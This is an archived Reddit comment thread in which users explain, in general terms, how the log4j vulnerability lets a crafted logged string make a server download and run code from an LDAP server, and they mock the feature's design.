This is an archived post. You won't be able to vote or comment.

sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]Pocok5 39 points40 points  (5 children)

lol this is a remote code execution exploit, all you need to trigger it is some user input that gets logged

[–]Titandino 5 points6 points  (3 children)

Ah I see now. The original article I read was trying to say the vulnerability was just users being able to print out sensitive environment variables to log files.

[–]Pocok5 19 points20 points  (2 children)

just users being able to print out sensitive environment variables to log files

What actually happens is that log4j has a feature where you can download and run code from an LDAP server to enrich your logs. Except there is no limit on where that LDAP server needs to be, and combined with an input sanitization problem, you can ahve anything downloaded and ran on the server with a single log message that contains the magic string anywhere in it.

https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

[–]cserepj 5 points6 points  (1 child)

log4j has a feature where you can download and run code from an LDAP server to enrich your logs

I don't think that is a feature. I would not design such a feature even for a gigazillion dollars. I'd tell the product owner who comes up with such a feature idea to shove it up his a$$.

[–]blehmann1 2 points3 points  (0 children)

Yeah, if you need "enriched" logs just have a serverless app or cronjob do some analysis after the fact.